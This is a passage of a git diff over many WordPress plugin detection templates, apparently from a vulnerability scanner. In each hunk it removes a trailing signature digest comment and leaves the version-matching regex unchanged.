diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 0acef415647..833207dcff4 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce1eeebf6bb0d21df9ed68fd31ab13b1e94bd23106ea041f1880d8d6970c53a70220028aea7ef937c8c94dc473a023a3bdb15bed3d8343dd179ee909e6918ad85b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 4b8f12f7dd0..b7ea2d38d1c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069b2f6c9715a1bfe94ab44a0d0858aada976f0f808e8f128f1bea072838246de0221008043e24af301d5480c19a006323e13138a3139de2913c6f1e25722344761714d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 6966e9d2121..2131dbe751b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e88766c2c34e73a8cd62cb9ba322985f3c0c8e9a0b6003cac99ca89c5bd30f7b022075b93709f0d4aae957b18e0137933c0e07806e6b3300495c67c7773487b55049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 2d17b94072d..73d644c5e47 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061015b7f99dd9657018412a489e65cdf28d576da57b2c4809a3d5547b0ef209f022055c6ed09c5358dde9623412498eb7c948e43d5f7ef739290278e412b073151d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 0b5201d733f..7b0593dcb76 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c01ed5745d2c84fe949cc6da571fb5bab31bd5ca997a6fcaad4b25db0141cf8022006436c209b8a64789e9eede83daca386b9d9ae7236d07db52433a416a9c75c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 096d1adf543..6f65d087e49 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ccbb12edcf6b28a2b0db3066ca32de5c91e9230e2629eb9f20fab4721213d614022043fff676972e511fe44235306b48945620a1e1f20367b4ca6129e208a600f6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 70db6e9bd10..783cdd283de 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073fd11fa5fde81d7eb4cb816ec25fdf4cf03ceaffa0641e66cbd7b1b36399fc202205e7891dc4d6592a061c19242dd67f87f0d27c122830645f86af4a13ccceb834f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 1c66f52de00..05121854b3e 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc68393c65a2b289659b2627db589caf0afdb94404fa51f18a893de7befa0264022100d284f3c395c38be590d67bd182ee7e6b6237d429fcbdf1ba1b68a227eacd142f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 77add18b70b..72f52edcd44 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d152a8979b5c9632ca1d1aa042a1569aa326681f0c4324f62642a87acea1971a02207921525d19f8cff5ea48d5d5749dce72d038d74086c486d770132cdf34ffd513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 0b2a29a34d2..4cf45ebd74c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ad26ba10d0c90df93f73fb49692bd8689fd619ab1c0fad402e0805aa3714c3b02202a47650f0c0f7ee7f947ddb7d5d21cdcac1744a233f429fac70cfcd9402c63e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 040ff060c60..3d6863e074c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cf252954ccefd208c94aacb4c95b8b4cfc200ecacdb230e3995cae40118e4bf022100ac2e7124a852afeac549ca5df2b98a0a422833435001ad3b53ab87508b1f2631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 321980822b9..79e2813c5eb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220723a466cdf6204175ec43712aaea9591c5c9e911932b57d37f27e070a5b880b3022100ea73f80d9413c2d486b10bffd96351d446dc72d0a1b5330a622adadf9523c8c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 1d9632e8a10..ab9a0f1ae30 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044b3037027b1997617df0d8a9aea4800daeb00b9ec759823b14380b19d0848cf022036323b31532e4af002a328b0d15ca65b5b90be9d2445a970803842ffd34b55d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 1c15185800f..5d3adf7c27a 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d5b7361cba850754aa203299aaf94c4a1c299d8b3ccc6e5fa887c65eb850ea8022100b23c18b15740e63bf8fe11a8988e7f59c0a271727162d7e02a576a67db270d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4f9a8a5339a..eda1d27f047 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c477016fd0df766e74ed70efad3dba5e053632a3afbd52898dd4c481fe1fbdf022022d4e4128c1373960559e9cdc4bda0d815ddfc59cb87c0054444c0146e6a34aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index b05346a3926..16dfc8df5f5 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205fb068721c7f620fc953014c5626a2660dee7d12f5235f63ae232c42d8d39edf022100fc472b16e7d94ed824105e58bec3333f03f07bf88f4bff173077911dc1cd57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index cbcd6eaca0f..4b7600ea697 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202af2e8b9787fce2afeff42c68d2d99b120348ff2ec4aabf29e90801a66f6abfc0221008c84c879124d1e1e2970b3b82f0144811ee5e1e21133e4a17f246497e24bbb47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index af01cd7a992..2ccd4dbce85 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0fedb65fda625860b3edb4303b3fb4c0e162ccf34fbfa89014f7df9a2d232c7022076d29aa5f1fdfb11b9f2b5c456fa78919d5de879b1e1bd73a36438a4bdd188df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 7329b3b0293..02ceb224d1c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9d6d81c20f991017f3124223e6862b9692e069a9959faa39e19c8a07731391e022100c3bce32805f85558636a57fb11cac6d911687038ec8447d5eb53cbbd8762d237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index f2ec9c13c4b..367d587ce2b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de3e2243c193310f4e0973ebba1e4d973f6db48e4e8caa627d6eb12bfeda905b02205f7ba99a6fc6a1e177c7d4ce15c6c118ee69dd37aae63b565101ab61b575e67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index b8719a33f19..feed730ee0c 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008da62990914f26f6d6c9a23d5b9933db7e4390e583dbf364bcae18eaadda52fe02201361fb4421bfdd870700543fd175842c4b4ef1866bab0680887dd2d0864a6cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9d15a9ecc7e..9b2841e7ca7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220059ae7c69b49810167d19fad14adaeb2de024a850763b6c0b7bfb0b6ff4839d5022100d479cae8f921513ff2acff81a51c72f6a77f184f91830fe875ec5f00324b164f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 27f857f4e74..42be14c5dfe 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce1515fad311fbd37d073ed7ac1e7bd25753204de659fbc213abb0d41e18f1ea022100eba17c30a6a8fa1882936ba389fad464a7ec4eb4d47d0dc03adbd609175b66dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index e24e2573def..4e0cd86c3f7 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a662fd0e8b542046eb2f4bc33561eb4cad45140690d1a2fbdb4e58246a77ba902200603bef835dcf94448fb6bc30025877d4deabbdd73ac4b663b7c9228c749fb08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index da214d605d5..59eadc5e6e7 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9a809e17e4d71482265577bebc1ba659f85baa4c428e7a3511929e7608cc0bf0220205fe4464d064b258adb9a89a250c4a2360c294ab93bf07ca57c58510650d40a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 9fd9cd5656f..41f7a0075e3 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae16457fb8a8b1da0e9efb67e7ad2be08454661e36c9f94fb2e12bb4b9d5b60b022006cca9463ab38c4cc06a75ec0f792f23d3e50ee6322aca43590057c9399f9b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index fd72a1e0de6..7e35a3fb4fa 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035d6fdb62d06c9b7993f6742a3595a61a27b154d76f612b22c0a35fab2a28bf202210094075f04e32a3b3458c01141aaa6e3a7b298f1e198e70878378c58f90d03ac8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index fa07947ba6b..18c2a7586e9 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f40d80db701c9dbd8cd8f0e99e556493432573828db8ec835b3cac5011b31bb02204f749f9de83a1dd693a1a9daa28bddbf5e6d37a02dc2fd73e66ccaf5a539ac04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 9995ad8aaaa..6bc2aa78f96 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207147d2f3fca453afc3743a0d9261d2b0426559027f850701d22c0ea1f1236522022078674543cb5d0f1cd0df67f9acf09847db3feb2277ab75245c1ddc1169f0dcc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 03733b8db18..a43d3352a27 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220185f705766bc1e8ba3bdc76863046c6bfe6251ec36efc83a86497b7ba5cfc99a022100b6ec129d9b3960e3b08c4333a93727fb69e5cbfafaf8ceb7734c3131402e203d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 5db7d5ebb53..e7db9944e45 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af6a6ee01aa5e0716fa888e19a140bf8717c84f277a1f2a4f7bffe0868f0fff2022100e6866e153a66f6d9efbed679eacb35d7279a05c4b15c0d96536865814820afb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index a64ae863672..268bd7b9dfa 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4ad67de36ba452c0723c920dac767f1fd9483c03293e7f97e9569e78e2e3233022100b913eff8c1a358f6a21b0e87681ba0896de20eada88c83674c6e86d80cf182cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 2b2e5b3910a..d7fb2209d19 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5a86a83715474a762815156e6a84ea2056bf06cfdc63e35155d8b429ba168ee022036a783a209cf8f41a130a8f6c97ac941ed21d3c2f83336451eb744c82c6d43b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 5048b1cfccd..a1641d46328 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c37d28c2c455c1f595cd1ee90a822318ca56e9659763001690d3cd0b1f030ab702200f0d47000be44932dc8575366e6e4d75b22e70d2cdd58419e03946d34ade6375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3dd14a1ee05..3b6542683c7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d9a2432d460f6674dc0f37b3fea4ad9c288b3a1390bb70e6b186737f6a0c7920220618a39b7c5e05509347c11b86f4e1355ae8f13ab80aacca269ab467fdef0469e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index cc2f86493f5..969c280ee17 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092bc434d32c638674e6d3c5a5a55b218f72a053fa6926d3a4f4eb65fd75fcfa8022100d3c4357245cf68d3fd251d220b113fdb8fb37960e485b7f39d4c9ccb36f742fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 828ffae16c0..1c97c422e41 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d9927b4fa6320bcb40a6979256d3e4e99c61bdc6f7933828a1fcd376ae6d6f802203bc6709cb31dd6f3d239daaff92e4442c5fef666b20c88dfdf29388b3129389c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 5e098ba3f4a..7d861cf06a1 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b09f5af46aa953e27cadc7030a47ae00f081d7d3bf1e533565e1c40f8c513c92022100f858959d1a4466cb8cdab609a982b9016bfa164209f533515f282d3110278629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 94649baf348..00eb1e2dfcf 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008269bf4fe901412b3b42c47d9b2155ae368e179fb0dd5a78fc45ebade64e2faa022100a5228df1524301e32f3b0ff7a0f4de83c2051ec53ae36831c0d4321a3a31cda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 1406ff1a7d5..f089ee37d31 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020511f6c1de1e846716a3317ff795f9b78a446ace6dfb651f93129788a25eff00221008e16ce945d3924b07796d77152e077475bb6a64dc1211add62ac86553561947c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index cfd8de4f96c..492d66db688 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b15e4c435a428c54f5709857212718c9e2db6e627b532d09e62a57fa399df03702203293e17f57f6a3157cc7806f4e4947d6a5715709a6d935a1ac840f47b446d72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index dfe8b6c9422..f8903fa3dbb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c39e8e59f9f69df5df80b158b9662914c34a93addfabf17cbe3525355916bad022100ae55e927eccf65e066f19237536757cf6b072512e9f825d5dc07801bc94635c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 139990b70e7..ae2451ca381 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2de9cd6e5a8f71d6174bcba1e1f68577833c86c232cdd65c12f97c5e4ed4165022066f89d9e723dfe1cee020417745a34b67664b51e319baf7bd941b7ea941f8695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3b9bb175882..dcc61d1255b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220340705f11205ba2e53c1e4e2aa46f1143290ec6cdd0a7f442161a7d0e7e9e9c6022030b4a5cebdeefcc68ae0628c22ef6795a3ce0b9ad660b0f5a098d15656673bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 01386642d00..d1d2c1c1d00 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026cc40e3e73c0c6b65cdfa11366abf4f8a49e7e17a3b143e432da4de562b6e95022039d690eac5b484937c112d6ed58f4640504057322201df981a47a1160f9398e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 929a7c2449c..5f5e8afed51 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b6d55a84e5c378e5acb0c69d458dd6452eda7d86f2825f5674528f10be59e19022014b5cb6919be0f10c26b15ff703565aebea9aea3cb1c5608eea924c2feb2f712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index afe23c5097b..d15634bb2b1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff6d14c10851c1070a455bd39670fea4430b7384c60395d970261e4ff9babe19022022701db514828fe5eed8c98771ff80cf72989fc450cddec1431c124f7345a82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index f0169e4730b..7da04be5d3e 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ 